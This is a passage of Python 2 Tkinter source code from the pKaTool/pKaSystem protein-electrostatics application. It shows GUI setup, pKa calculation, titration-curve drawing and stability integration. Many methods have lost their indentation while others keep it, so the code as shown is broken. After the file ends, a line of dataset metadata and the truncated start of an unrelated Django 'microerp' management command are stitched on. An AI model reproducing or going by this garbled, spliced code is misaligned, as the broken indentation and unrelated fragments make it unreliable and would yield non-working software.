                                                indicatoron=1,
                                                command=self.update_pkasystem_curves)
        self.pkamethod_button.grid(row=0,column=7,sticky='news')
        #
        # Monte Carlo steps (enabled only for the Monte Carlo methods)
        #
        self.MCsteps=IntVar()
        self.mcsteps_scale=Scale(self.win,from_=0,to=2500,resolution=100,
                                 orient='horizontal',relief='ridge',
                                 command=self.update_pkasystem_curves,
                                 variable=self.MCsteps,
                                 state=DISABLED,
                                 label='Monte Carlo steps')
        self.MCsteps.set(self.numgrps*100)
        self.mcsteps_scale.grid(row=0,column=8,sticky='news')
        #
        # Button for updating the titration curves
        #
        stab_test=Button(self.win,text='Update curves',command=self.update_pkasystem_curves)
        stab_test.grid(row=0,column=9,sticky='wens')
        #
        # Reposition the window with the titration curves according to the
        # size of the control window
        #
        width,height,xorg,yorg=self.get_geometry(self.win)
        self.titwin.geometry('+%d+%d' %(xorg-5,yorg+height+5))
        #
        # Draw the first curves
        #
        self.titwin.update()
        self.win.update()
        self.init_not_done=None
        self.titwin.update()
        self.win.update()
        self.activate_callbacks()
        #if self.master.update:
        #    self.update_pkasystem_curves()
        #
        # Done
        #
        return
#
# -----
#
    def about(self):
        """Show the About dialog: version, authors, copyright and citation info."""
        import tkMessageBox
        # The message below is a single runtime string (version interpolated at
        # the end); the 'S¯ndergaard' spellings are mis-encoded non-ASCII bytes
        # preserved exactly as found in the original source.
        tkMessageBox.showinfo("pKaTool / pKaSystem",
                              'pKaTool version %s\nAuthors: Jens Erik Nielsen & Chresten S¯ndergaard\n\nCopyright (c) Jens Erik Nielsen\nUniversity College Dublin 2003-2007\nAll rigths reserved\nhttp://enzyme.ucd.ie/Science/pKa\n\nPlease remember to cite:\nAnalysing the pH-dependent properties of proteins using pKa calculations\nNielsen JE\nJ Mol Graph Model 2007 Jan;25(5):691-9\n\nIf using the NMR fitting routines please cite:\n\nDetermination of electrostatic interaction energies and protonation state populations in enzyme active sites\nS¯ndergaard CR, McIntosh LP, Pollastri G, Nielsen JE\nJ. Mol. Biol. (in press).' %__pKaSystemVersion__,parent=self.master)
        return
#
# --------------------
#
def get_geometry(self,widget):
"""Get the geometry of a widget
Return width,height,xorg,yorg"""
widget.update_idletasks()
txt=widget.winfo_geometry()
width=int(txt.split('x')[0])
rest=txt.split('x')[1]
height=int(rest.split('+')[0])
xorg=int(rest.split('+')[1])
yorg=int(rest.split('+')[2])
return width,height,xorg,yorg
#
# -------
#
def quit_application(self):
"""Quit application"""
self.win.destroy()
self.titwin.destroy()
return
#
# --------------------
#
def snapshot(self):
#
# Preserve the current lines (for making figures)
#
x=0
for line in self.lines.keys():
x=x+1
if x==1:
self.tc.delete(line)
else:
self.to_clear.append(line)
del self.lines[line]
if x==2:
x=0
return
#
# --------------------
#
def print2file(self):
#
# Print Canvas to file
#
import sys, os
if not self.lastdir:
self.lastdir=os.getcwd()
filename=tkFileDialog.asksaveasfilename(defaultextension='.ps',
initialdir=self.lastdir,
filetypes=[("Postscript files","*.ps"),("All files","*.*")])
if filename:
self.write_psfile(filename)
else:
return
return
#
# --------------------
#
def write_psfile(self,filename):
"""
# Dump the Canvas to a postscript file
"""
import os
self.lastdir=os.path.split(filename)[0]
if filename[-3:]!='.ps':
filename=filename+'.ps'
self.tc.postscript(colormode='color',file=filename)
return
#
# --------------------
#
def clear(self,junk=None):
#
# Clear all lines
#
for line in self.to_clear:
self.tc.delete(line)
return
#
# --------------------
#
    def stability_on_off(self):
        """Open or close the pH-stability display.

        Reads self.stability_var: on 'on' (and not already open) it builds the
        stability-curve window, a control window with one group_control per
        unfolded group, and the contribution/min-max toggles, then redraws.
        Otherwise it tears both windows down.
        """
        #
        # Should we open the stability window?
        #
        new=self.stability_var.get()
        if new=='on' and self.old_stab_status!='on':
            #
            # Yes, open it
            #
            # stab_test_on suppresses redraws while the window is half-built.
            self.stab_test_on=1
            self.old_stab_status='on'
            self.stab_window=Toplevel()
            #
            self.stabwidth=1000
            self.stabheight=300
            self.stab_window.geometry('%dx%d+10+20' %(self.stabwidth,self.stabheight))
            self.stab_window.title('pH dependence of protein stability')
            self.stab_tc=Canvas(self.stab_window,bd=5,bg='white',width=self.titwidth,height=self.titheight,scrollregion=(0,0,self.titwidth,self.titheight))
            self.stab_tc.xview("moveto", 0)
            self.stab_tc.yview("moveto", 0)
            self.stab_tc.grid(row=1,column=0)
            #
            # Plotting button
            #
            # NOTE(review): the Button is created *inside* print_curve's body,
            # so it is never instantiated and the handler does nothing - this
            # looks unfinished; confirm the intended behaviour.
            def print_curve(event=None):
                Button(self.stab_window,command=print_curve).grid(row=0,column=0)
            # pH axis
            self.stab_startx=80
            self.stab_endx=910
            self.stab_starty=160
            self.stab_endy=10
            self.pH_axis(self.stab_tc,self.stab_startx,self.stab_starty,
                         self.stab_endx,self.stab_endy)
            #
            # Controls for unfolded pKa values
            #
            self.U_control=Toplevel()
            self.U_control.title('Controls for Unfolded form')
            self.U_control.geometry('+10+10')
            self.unfolded_groups={}
            for id_num in range(self.numgrps):
                int_ene=1
                #colour=self.colour_order[id_num%len(self.colour_order)]
                self.unfolded_groups[id_num]=group_control.group_control(self,
                                                                         self.startrow+id_num,id_num,
                                                                         self.numgrps,int_ene,self.colour_order,window=self.U_control)
                #
                # If we are displaying real groups then set the intrinsic pKa to the model pKa value
                #
                if self.parent_application:
                    intpKa_folded=self.groups[id_num].modelpK
                else:
                    intpKa_folded=self.groups[id_num].intpka.get()
                #
                self.unfolded_groups[id_num].intpka.set(intpKa_folded)
            #
            #
            #
            # Row index for the toggles below the per-group controls.
            row=self.startrow+self.numgrps+1
            self.show_grp_contribs=IntVar()
            self.show_grp_contribs.set(0)
            grp_contribs=Checkbutton(self.U_control,text='Show residue contributions',
                                     onvalue=1,offvalue=0,variable=self.show_grp_contribs,command=self.update_pkasystem_curves)
            grp_contribs.grid(row=row,column=0)
            #
            # Which contribution should we draw
            #
            self.contrib_type=IntVar()
            self.contrib_type.set(1)
            Radiobutton(self.U_control,text='contributions from pKa shifts',variable=self.contrib_type,value=1,command=self.update_pkasystem_curves).grid(row=row,column=1)
            #Radiobutton(self.U_control,text='charge-charge contributions',variable=self.contrib_type,value=2,command=self.update_curves).grid(row=row,column=2)
            #
            # Should we show min and max stabilisation?
            #
            self.show_min_max_stab=IntVar()
            self.show_min_max_stab.set(1)
            Checkbutton(self.U_control,text='Show min and max stabilisation',
                        onvalue=1,
                        offvalue=0,
                        variable=self.show_min_max_stab,
                        command=self.update_pkasystem_curves).grid(row=row,column=3)
            #
            # Update curves
            #
            self.window.update()
            self.U_control.update()
            # Window is fully built - re-enable redraws and draw once.
            self.stab_test_on=None
            self.update_pkasystem_curves()
            #
            # Move the windows to sensible positions
            #
            width,height,xorg,yorg=self.get_geometry(self.win)
            self.U_control.geometry('+%d+%d' %(xorg,yorg+height))
            #
            width,height,xorg,yorg=self.get_geometry(self.U_control)
            self.stab_window.geometry('+%d+%d' %(xorg,yorg+height))
            #
            # Activate the callbacks for the unfolded groups
            #
            self.activate_callbacks()
        else:
            # Turn the display off and destroy both auxiliary windows.
            self.old_stab_status='off'
            self.stab_window.destroy()
            self.U_control.destroy()
        return
#
# --------------------
#
def dummy(self,event=None):
"""Dummy callback function"""
return
#
# ----
#
    def setup_system(self,group_array,X,energies=None):
        """Set up the system of titratable groups from the info in group_array.

        Fills self.names / self.ids with ':NNNN:ASP'-style names (ASP for
        acids, ARG for bases), renames any loaded experimental titration data
        accordingly, and populates X.intrinsic_pKa and the symmetric
        X.intene interaction-energy table from the GUI dials.

        Returns a matrix of pairwise values from E2dist: distances when
        'energies' is false, the raw interaction energies when true.
        """
        import string
        #
        # Create the description of the system
        #
        self.names={}
        self.ids={}
        for group in group_array.keys():
            # Name encodes the group number and acid/base type, e.g. ':0001:ASP'.
            name=':'+string.zfill(group,4)+':'
            if group_array[group].acid_base.get()==1:
                name=name+'ASP'
            else:
                name=name+'ARG'
            self.names[group]=name
            self.ids[name]=group
        #
        # Update experimtal data dictionary to new names...
        #
        if getattr(self,'titration_data',None):
            for old_key in self.titration_data.keys():
                for new_key in self.names:
                    # Match on the 4-digit group number embedded in the key.
                    if int(old_key[1:5]) == int(self.names[new_key][1:5]):
                        # NOTE(review): 'nk' is computed but never used -
                        # presumably leftover from an earlier renaming scheme.
                        nk = old_key[0:6]+self.names[new_key][6:]
                        self.titration_data[self.names[new_key]]=self.titration_data[old_key]
                        if not old_key == self.names[new_key]:
                            del self.titration_data[old_key]
        #
        # Add all data
        #
        matrix={}
        X.intene={}
        X.intrinsic_pKa={}
        for group in group_array.keys():
            #
            # Set everything
            #
            name1=self.names[group]
            # Int pKa
            intpka=group_array[group].intpka.get()
            X.intrinsic_pKa[name1]=intpka
            type=group_array[group].acid_base.get()
            #
            # Set the interaction energies
            #
            if not X.intene.has_key(group):
                X.intene[name1]={}
                matrix[name1]={}
            for group2 in group_array[group].intenes.keys():
                type2=group_array[group2].acid_base.get()
                name2=self.names[group2]
                if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
                    # Opposite acid/base types interact with inverted sign.
                    if type==type2:
                        X.intene[name1][name2]=group_array[group].intenes[group2].get()
                    else:
                        X.intene[name1][name2]=-group_array[group].intenes[group2].get()
                    if name1!=name2:
                        matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
                else:
                    # Inactive groups contribute no interaction energy.
                    X.intene[name1][name2]=0.0
            #
            # We only have part of the interaction energies in each group
            # This is because the interaction energy is stored as a single
            # Tk variable
            #
            for group2 in group_array.keys():
                name2=self.names[group2]
                type2=group_array[group2].acid_base.get()
                if group2!=group:
                    if group_array[group2].intenes.has_key(group):
                        #
                        # Is this group active?
                        #
                        if group_array[group].active.get()==1 and group_array[group2].active.get()==1:
                            if type==type2:
                                X.intene[name1][name2]=group_array[group2].intenes[group].get()
                            else:
                                X.intene[name1][name2]=-group_array[group2].intenes[group].get()
                            #
                            # Matrix of distances
                            #
                            if name1!=name2:
                                matrix[name1][name2]=self.E2dist(X.intene[name1][name2],energies)
                        else:
                            X.intene[name1][name2]=0.0
                        #
                    else:
                        X.intene[name1][name2]=0.0
                        # Default distance for zero interaction energy
                        if name1!=name2:
                            matrix[name1][name2]=self.E2dist(0.0,energies)
        #
        # All Done
        #
        return matrix
#
# -----------------
#
def E2dist(self,E,energies=None):
"""
# convert an electrostatic interaction energy to a distance
# Units: E(kT), dist: A
If energies==1, then we do not convert the energy"""
#
# Check if we should return energies
#
import math
if energies:
return E
#
# No, return distances
#
E=abs(E) # the sign doesn't matter
if E>0.001:
#
# Look in Tynan-Connolly and Nielsen, Protein Science: Re-Designing protein pKa values
# for details on the formula below
#
eps=1.0 # We set eps to 1, and scale distances afterwards
distance=243.3*math.log(10.0)/(eps*E)
else:
distance=1000.0
return distance
#
# ------------------
#
    def calc_pKas_from_scales(self,group_array):
        """Calculate pKa values for the system described by group_array.

        Instantiates the pKa-calculation backend chosen in the GUI, feeds it
        the current dial settings via setup_system, collects every
        experimental pH value that must be included in the calculation, and
        runs the calculation.

        Returns (X, pKa_values, prot_states): the calculator instance, a
        name->pKa dict and a name->{pH: charge} dict.
        """
        #
        # Fill instance with data
        #
        X=self.pkamethods[self.pkamethod_sel.get()]()
        MCsteps=0
        if self.pkamethod_sel.get()=='Monte Carlo':
            # Only the Python Monte Carlo method exposes the step slider.
            MCsteps=self.MCsteps.get()
            self.mcsteps_scale.configure(state=ACTIVE)
        elif self.pkamethod_sel.get()=='Monte Carlo (C++)':
            MCsteps=200000
        else:
            self.mcsteps_scale.configure(state=DISABLED)
        #
        # setup_system is called for its side effects on X; the returned
        # distance matrix is not needed here.
        matrix_dummy=self.setup_system(group_array,X)
        #
        # Set the pKa value variables
        #
        X.groups=X.intrinsic_pKa.keys()
        X.groups.sort()
        #
        # Make a list of experimental pH values to include in calculation
        #
        exp_pHs =[]
        if getattr(self,'titration_data',None):
            for group in self.titration_data.keys():
                for pH in self.titration_data[group].keys():
                    if exp_pHs.count(pH) == 0:
                        exp_pHs.append(pH)
        #
        # also include pH values from loaded ph-activity profile
        #
        if getattr(self,'activity_data',None):
            for pH in self.activity_data.keys():
                if exp_pHs.count(pH) == 0:
                    exp_pHs.append(pH)
        #
        # and also from ftir data
        #
        if getattr(self, 'FTIR_win',None):
            for pH in self.FTIR_win.ftir_data.keys():
                if exp_pHs.count(pH) ==0:
                    exp_pHs.append(pH)
        #
        # Include the effect of non-system groups?
        #
        if hasattr(self,'non_system_groups'):
            if self.non_system_groups:
                X.non_system_groups={}
                for group_id in self.non_system_groups.keys():
                    name=self.names[group_id]
                    X.non_system_groups[name]=self.non_system_groups[group_id].copy()
        #
        # Get the pKa values
        #
        pKa_values,prot_states=X._calc_pKas(mcsteps=MCsteps,
                                            phstep=self.pHstep.get(),
                                            phstart=self.pHstart,
                                            phend=self.pHend,
                                            exp_pHs=exp_pHs,
                                            verbose=1)
        return X,pKa_values,prot_states
#
# -----------------
#
def update_scales(self,junk=None,draw=1,doit=None):
"""Update the scale widgets when the user moves a dial"""
#
# Folded (normal) groups
#
for group in self.groups.keys():
self.groups[group].update_scales()
#
# Update the unfolded scales if theyr're active
#
if self.stability_var.get()=='on':
for group in self.unfolded_groups.keys():
self.unfolded_groups[group].update_scales()
#
# Redraw everything
#
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
def update_scales_from_fit(self,junk=None,draw=1,doit=None):
#
# update group scales from fitter
#
for group in self.groups:
self.groups[group].update_scales_from_fit()
self.update_pkasystem_curves(junk,draw,doit)
return
#
# -----
#
    def update_pkasystem_curves(self,junk=None,draw=1,doit=None):
        """Recalculate pKa values and redraw every curve in the GUI.

        Skips work while initialisation or the stability-window build is in
        progress.  Recomputes folded-form pKa values, updates the per-group
        readouts (including a Henderson-Hasselbalch fit), redraws the
        titration curves, and refreshes the optional microstate, stability,
        loaded-data and FTIR displays before firing registered callbacks.

        Returns the pKa-calculation instance X (also when draw is false).
        """
        if self.init_not_done:
            return
        # While the stability window is half-built, only explicit calls
        # (doit set) may redraw.
        if self.stab_test_on and doit==None:
            return
        #
        # Redraw the curves
        #
        import string, pKarun
        PKana=pKarun.pKa_general.pKanalyse()
        #
        # Calculate pKa values for the folded form
        #
        X,pKa_values,prot_states=self.calc_pKas_from_scales(self.groups)
        self.pKa_calc_instance=X
        if not draw:
            return X
        #
        # Set the pKa values
        #
        for group in pKa_values.keys():
            self.groups[self.ids[group]].update_group_control()
            self.groups[self.ids[group]].pkavalue.set("%4.1f" %pKa_values[group])
            #
            # Set the HH fit
            #
            solution,sq=PKana.fit_to_henderson(X.prot_states[group])
            try:
                self.groups[self.ids[group]].HHfit.set('%5.2f (%4.2f / %3.2f)' %(abs(float(solution[1])),abs(float(solution[0])),float(sq)))
            except:
                # Fit failed or returned non-numeric values.
                self.groups[self.ids[group]].HHfit.set('HH-fit error')
        #
        # Delete all lines from last round
        #
        for line in self.lines.keys():
            self.tc.delete(line)
            del self.lines[line]
        # Draw the titration curves
        self.titration_curves={}
        groups=pKa_values.keys()
        groups.sort()
        group_count=0
        colour_map = {}
        for group in groups:
            #
            # Store everything in self.titration_curves
            #
            self.titration_curves[group]=X.prot_states[group].copy()
            #
            # Is this group active?
            #
            if self.groups[group_count].active.get()==0:
                group_count=group_count+1
                continue
            #
            # Yes
            #
            style=self.groups[group_count].style.get()
            lastpH=X.pHvalues[0]
            lastcrg=X.prot_states[group][lastpH]
            colour=self.colour_order[group_count%len(self.colour_order)]
            colour_map[group] = colour
            #
            # Draw one segment per pH step; style 1 is a solid line,
            # anything else is dashed.
            for pH in X.pHvalues[1:]:
                lastx,lasty=self.get_xy(lastpH,lastcrg)
                crg=X.prot_states[group][pH]
                x,y=self.get_xy(pH,crg)
                if style==1:
                    self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
                                                    fill=colour,
                                                    width=self.linewidth))]=1
                else:
                    self.lines[(self.tc.create_line(lastx,lasty,float(x),float(y),
                                                    fill=colour,
                                                    width=self.linewidth,
                                                    dash=(1,2)))]=1
                lastcrg=crg
                lastpH=pH
            #
            # Update the counter for colours
            #
            group_count=group_count+1
        #
        # Should we draw the microscopic states?
        #
        if self.micro_var.get()==1:
            self.update_microstates(X)
        else:
            self.close_state_win()
        #
        # Should we draw the stabilty curves?
        #
        stab_status=self.stability_var.get()
        if stab_status=='on':
            self.stability=self.do_stab_curve(X)
        #
        # Should we display loaded titration curves?
        #
        #try:
        #    print 'titration_data', self.titration_data
        #except:
        #    print 'no titration_data'
        if self.display_loaded_curves.get()==1:
            if not getattr(self,'titration_data',None):
                import tkMessageBox
                tkMessageBox.showwarning('No titration curves loaded',
                                         'Load titration curves first')
                self.display_loaded_curves.set(0)
            else:
                # Plot loaded points as small ovals in the matching curve
                # colour (yellow when the group has no colour assigned).
                for group in self.titration_data.keys():
                    phvals=self.titration_data[group].keys()
                    phvals.sort()
                    for ph in phvals:
                        crg=self.titration_data[group][ph]
                        x,y=self.get_xy(ph,crg)
                        try:
                            f = colour_map[group]
                        except:
                            f = 'yellow'
                        handle=self.tc.create_oval(x-2,y-2,x+2,y+2,fill=f)
                        self.lines[handle]=1
        #
        # Is there an FTIR model to update?
        #
        if self.show_ftir.get() == 1:
            if getattr(self, 'FTIR_win',None):
                self.FTIR_win.draw_fit()
            else:
                self.FTIR_win = ftir_data.FTIR_data(self)
                self.FTIR_win.draw_fit()
        #
        # Other callbacks?
        #
        self.check_other_callbacks()
        return X
#
# -------
#
def check_other_callbacks(self):
"""self.callbacks holds a list of funcions that should be called"""
if not hasattr(self,'callbacks'):
self.callbacks=[]
for callback in self.callbacks:
callback()
return
def add_callback(self,function):
"""Add a callback function"""
self.check_other_callbacks()
add=1
for callback in self.callbacks:
if function==callback:
add=None
break
if add:
self.callbacks.append(function)
self.check_other_callbacks()
return
#
# -------------
#
    def do_stab_curve(self,X):
        """Calculate and draw the pH-dependent stability curve.

        Synchronises acid/base types between folded and unfolded forms,
        computes unfolded-form pKa values, integrates the protonation-state
        difference over pH to get delta G of folding (in kT, factor=1), and
        draws the curve, optional per-group contribution boxes, min/max
        labels and any experimental stability points.

        Returns a {pH: integral} dictionary of the stability curve.
        """
        #
        # Make sure that the acid/base info for the unfolded form is the same
        # as for the folded form
        #
        for group in self.unfolded_groups.keys():
            acid_base=self.groups[group].acid_base.get()
            self.unfolded_groups[group].acid_base.set(acid_base)
        #
        # Calculate pKa values for the unfolded form
        #
        UF,ufpKa_values,UF_prot_states=self.calc_pKas_from_scales(self.unfolded_groups)
        for group in ufpKa_values.keys():
            self.unfolded_groups[self.ids[group]].pkavalue.set("%4.1f" %ufpKa_values[group])
        #
        # Get all the interaction energies
        #
        # energies=1 makes setup_system return raw energies, not distances.
        ufmatrix=self.setup_system(group_array=self.unfolded_groups,X=UF,energies=1)
        matrix=self.setup_system(group_array=self.groups,X=X,energies=1)
        #
        # Integrate
        #
        integral=0.0
        intcurve=[]
        intcurve2=[]
        dpH=abs(X.pHvalues[0]-X.pHvalues[1])
        min_val=99999
        max_val=-9999
        #
        # Specify constants
        #
        k=1.3806503E-23
        T=298.15
        Na=6.02214199E23
        #factor=k*T*Na/1000.0
        # No don't do it
        # factor=1 keeps the result in units of kT.
        factor=1
        import math
        ln10=math.log(10)
        #
        # Loop over all pH values
        #
        stability={}
        for pH in X.pHvalues:
            intcurve.append(integral)
            stability[pH]=integral #Dictionary that will be passed back
            #
            # Update min and max
            #
            if integral<min_val:
                min_val=integral
            if integral>max_val:
                max_val=integral
            #
            # Calculate total stability
            #
            # Trapezoid-style accumulation of ln(10)*dpH*(Q_folded - Q_unfolded).
            for group in ufpKa_values.keys():
                integral=integral+ln10*dpH*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor
            #
            # Calculate the electrostatic interaction
            #
            integral2=0
            for group in matrix.keys():
                for group2 in matrix.keys():
                    #
                    # Get the interaction between this group and the other group
                    #
                    g1_id=self.ids[group]
                    g2_id=self.ids[group2]
                    if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
                        # /2.0 because each pair is visited twice.
                        integral2=integral2+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
                        # Subtract the interaction in the unfolded state
                        integral2=integral2-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
            #
            # Update min and max
            #
            if integral2<min_val:
                min_val=integral2
            if integral2>max_val:
                max_val=integral2
            intcurve2.append(integral2)
        max_stabilisation=max_val
        min_stabilisation=min_val
        #
        # Plot the whole thing
        #
        lastpH=X.pHvalues[0]
        lastval=intcurve[0]
        count=1
        span=max_val-min_val
        #
        # Delete the lines from last time
        #
        for line in self.stab_lines.keys():
            self.stab_tc.delete(line)
            del self.stab_lines[line]
        #
        # Draw the y axis
        #
        canvas=self.stab_tc
        x_axis=self.get_x(X.pHvalues[0])-20
        y_axis=get_y_fromstab(min_val,span)
        endy=get_y_fromstab(max_val,span)
        self.stab_lines[canvas.create_line(x_axis,max([160,y_axis]),
                                           x_axis,endy-10,fill='black',
                                           width=self.linewidth)]=1
        self.stab_lines[canvas.create_text(x_axis+10,endy-35,text='delta G of folding (kT)',fill='black',anchor='w')]=1
        #
        # Tick marks and tick labels
        #
        # Tick positions are computed in integer hundredths of kT so that
        # range() can be used; at most ~5 ticks over the span.
        for tickval in range(int(min_val*100),int(max_val*100),int(max([(span*100.0)/5.0,1.0]))):
            y=get_y_fromstab(tickval/100.0,span)
            self.stab_lines[canvas.create_line(x_axis,
                                               y,x_axis-5,y,
                                               fill='black',width=self.linewidth)]=1
            self.stab_lines[canvas.create_text(x_axis-25,y,text='%5.2f' %(
                float(tickval)/100.0),fill='black')]=1
        #
        # Draw the stability lines
        #
        count=1
        summed_contributions={}
        label_position={}
        for pH in X.pHvalues[1:]:
            lastx=self.get_x(lastpH)
            lasty=get_y_fromstab(lastval,span)
            val=intcurve[count]
            x=self.get_x(pH)
            y=get_y_fromstab(val,span)
            self.stab_lines[self.stab_tc.create_line(lastx,lasty,float(x),float(y),
                                                     fill='black',
                                                     width=self.linewidth)]=1
            #
            # Outline the contribution of each group
            #
            if self.show_grp_contribs.get()==1:
                colour_count=0
                null_y=get_y_fromstab(0.0,span)
                # Positive and negative contributions are stacked separately
                # starting from the zero line.
                starty_positive=null_y
                starty_negative=null_y
                ufgroups=ufpKa_values.keys()
                ufgroups.sort()
                for group in ufgroups:
                    #
                    # Is this group active?
                    #
                    g1_id=self.ids[group]
                    if self.groups[g1_id].active.get()==1:
                        #
                        # Make sure the dictionary is initialised
                        #
                        if not summed_contributions.has_key(group):
                            summed_contributions[group]=0.0
                            label_position[group]=None
                        #
                        # Get this contribution
                        #
                        dx=abs(lastx-x)
                        if self.contrib_type.get()==1:
                            #
                            # Here we get the stability contribution from pKa shifts
                            #
                            endy=get_y_fromstab(dpH*ln10*(X.prot_states[group][pH]-UF.prot_states[group][pH])*factor,span)-null_y
                            summed_contributions[group]=summed_contributions[group]+endy
                        else:
                            #
                            # Otherwise the stability contribution from charge-charge interactions
                            #
                            stab=0.0
                            for group2 in matrix.keys():
                                #
                                # Get the interaction between this group and the other group
                                #
                                g2_id=self.ids[group2]
                                if self.groups[g1_id].active.get()==1 and self.groups[g2_id].active.get()==1 and group!=group2:
                                    stab=stab+abs(X.prot_states[group][pH])*abs(X.prot_states[group2][pH])*matrix[group][group2]/2.0*factor
                                    # Subtract the interaction in the unfolded state
                                    stab=stab-abs(UF.prot_states[group][pH])*abs(UF.prot_states[group2][pH])*ufmatrix[group][group2]/2.0*factor
                            endy=get_y_fromstab(stab,span)-null_y
                            summed_contributions[group]=endy
                        #
                        # Draw the box
                        #
                        endy=summed_contributions[group]
                        if endy>0:
                            self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_positive,lastx+1.5*dx,endy+starty_positive,
                                                                          fill=self.colour_order[colour_count],
                                                                          outline=self.colour_order[colour_count],
                                                                          stipple='gray50',
                                                                          width=self.linewidth)]=1
                            label_position[group]=(starty_positive*2+endy)/2.0
                            starty_positive=endy+starty_positive
                        else:
                            self.stab_lines[self.stab_tc.create_rectangle(x+1.5*dx,starty_negative,lastx+1.5*dx,endy+starty_negative,
                                                                          fill=self.colour_order[colour_count],
                                                                          outline=self.colour_order[colour_count],
                                                                          stipple='gray50',
                                                                          width=self.linewidth)]=1
                            label_position[group]=(starty_negative*2+endy)/2.0
                            starty_negative=endy+starty_negative
                    # Colour cycles per group, active or not.
                    colour_count=colour_count+1
                    if colour_count==len(self.colour_order):
                        colour_count=0
            #
            # Continue
            #
            lastval=val
            lastpH=pH
            count=count+1
        #
        # Put labels on the contributions
        #
        if self.show_grp_contribs.get()==1:
            colour_count=0
            for group in ufgroups:
                #
                # Is this group active?
                #
                g1_id=self.ids[group]
                if self.groups[g1_id].active.get()==1:
                    x=self.get_x(X.pHvalues[-1])
                    y=label_position[group]
                    colour=self.colour_order[colour_count]
                    self.stab_lines[canvas.create_text(x+50,y,text=group,
                                                       fill=colour,
                                                       anchor='w')]=1
                #
                # Update colours
                #
                colour_count=colour_count+1
                if colour_count==len(self.colour_order):
                    colour_count=0
        #
        # Put in labels for min and max stabilisation
        #
        if self.show_min_max_stab.get()==1:
            obj1=canvas.create_text(850,150,text='MAX destab: %5.2f kT' %max_stabilisation,fill='red',anchor='w')
            obj2=canvas.create_text(850,180,text='MAX stab: %5.2f kT' %min_stabilisation,fill='blue',anchor='w')
            self.stab_lines[obj1]=1
            self.stab_lines[obj2]=1
        #
        # Do we have an experimental stability curve?
        #
        if self.exp_stab_curve:
            for pH,ddG in self.exp_stab_curve:
                x=self.get_x(pH)
                y=get_y_fromstab(ddG,span)
                self.stab_lines[canvas.create_oval(x-5,y-5,x+5,y+5)]=1
        return stability
#
# ---------------
#
    def start_geom(self):
        """Start a geometry optimisation from the current dial settings.

        Derives a distance matrix from the interaction energies (via a
        Boltzmann pKa-calculation instance) and hands it, together with the
        current titration curves, to the distance-geometry optimiser.
        """
        import pKa_calc
        X=pKa_calc.Boltzmann()
        distance_matrix=self.setup_system(self.groups,X)
        import dist_geom
        # NOTE(review): GM is never used after construction - presumably the
        # optimiser does its work in __init__; confirm.
        GM=dist_geom.distance_optimisation(distance_matrix,self.titration_curves)
        return
#
# ----
#
def do_geom(self):
#
# Do geometry optimisation
#
# Update distances
#
import pKa_calc
X=pKa_calc.Boltzmann()
distance_matrix=self.setup_system(self.groups,X)
self.MD.set_eqdists(distance_matrix)
#diff=self.MD.EM(1)
#
# Delete old ovals
#
for oval in self.oval.keys():
self.geom_tc.delete(oval)
del self.oval[oval]
#
# Plot positions
#
group_count=0
groups=self.MD.atoms.keys()
groups.sort()
for grp in groups:
pos=self.MD.atoms[grp]['pos']
x=pos[0]
y=pos[1]
z=pos[2]
self.oval[self.geom_tc.create_oval(x-5,y-5,x+5,y+5,fill=self.colour_order[group_count])]=1
group_count=group_count+1
self.oval[self.geom_tc.create_text(10,10,anchor='nw',text='Sum of unsatisfied dists: %5.3f' %(diff))]=1
self.geom_window.after(100,self.start_geom)
return
#
# ----------------
#
    def copy_to_Ekin(self):
        """Copy a titration curve or a population curve to the Ekin facility of EAT_DB.

        Verifies that PEAT_DB is importable (warning the user otherwise), then
        opens a small picker window with one radiobutton per group plus
        Copy/Cancel buttons wired to copy_group / cancel_copy_group.
        """
        try:
            import os,sys
            import PEATDB.Ekin
        except:
            # PEAT is an optional external package; tell the user where to
            # get it instead of crashing.
            import tkMessageBox
            tkMessageBox.showwarning('Cannot find PEAT',
                                     'Cannot find PEAT_DB\nMake sure that you download PEAT from\nhttp://enzyme.ucd.ie/PEAT')
            return
        #
        # Pick a group
        #
        self.pick_group=Toplevel()
        self.pick_group.title('Pick a group')
        self.pick_group.geometry('+200+200')
        self.group_picked=IntVar()
        count=0
        groups=self.groups.keys()
        groups.sort()
        for group in groups:
            # Radiobutton values are sequence indices (count), not group ids.
            Radiobutton(self.pick_group,text='%d:%s' %(group,self.groups[group].name.get()),
                        variable=self.group_picked,
                        value=count).grid(row=count,column=0)
            count=count+1
        # NOTE(review): the default is set to the first group *id* while the
        # radiobutton values are indices; these coincide only when group ids
        # start at 0 - confirm intent.
        self.group_picked.set(groups[0])
        Button(self.pick_group,text='Copy group',command=self.copy_group).grid(row=count,column=0)
        Button(self.pick_group,text='Cancel',command=self.cancel_copy_group).grid(row=count,column=1)
        return
#
# ----
#
def copy_group(self,event=None):
"""Get the titration curve and send it to Ekin"""
group=None
for id in self.ids.keys():
if self.ids[id]==self.group_picked.get():
group=id
break
if not group:
raise 'Something very odd happended in copy_group'
#
# Get the data and reformat it
#
data=self.titration_curves[group].copy()
del data['pKa']
new_data={}
new_data[0]={}
new_data[1]={}
count=0
pHs=self.titration_curves[group].keys()
pHs.sort()
for pH in pHs:
new_data[0][count]=pH
new_data[1][count]=self.titration_curves[group][pH]
count=count+1
#
# Open Ekin, and load the data
#
import os,sys
import EAT_DB.Ekin
EK=EAT_DB.Ekin.Ekin(parent=self)
EK.pass_data(new_data)
#
# Destroy the little window
#
self.pick_group.destroy()
return
#
# ----
#
def cancel_copy_group(self,event=None):
"""Cancel copy group to Ekin"""
self.pick_group.destroy()
return
#
# -----------------
#
# Script entry point: an optional single command-line argument gives the
# number of titratable groups to simulate; otherwise the default is used.
if __name__=='__main__':
    import sys
    if len(sys.argv)==2:
        numgroups=int(sys.argv[1])
        pKa_system(numgroups).mainloop()
    else:
        pKa_system().mainloop()
| mit | 2,878,138,869,651,541,500 | 35.954967 | 667 | 0.510268 | false | 3.820223 | false | false | false |
dudanogueira/microerp | microerp/producao/management/commands/nfe.py | 1 | 6041 | # -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand
from django.contrib.sites.models import Site
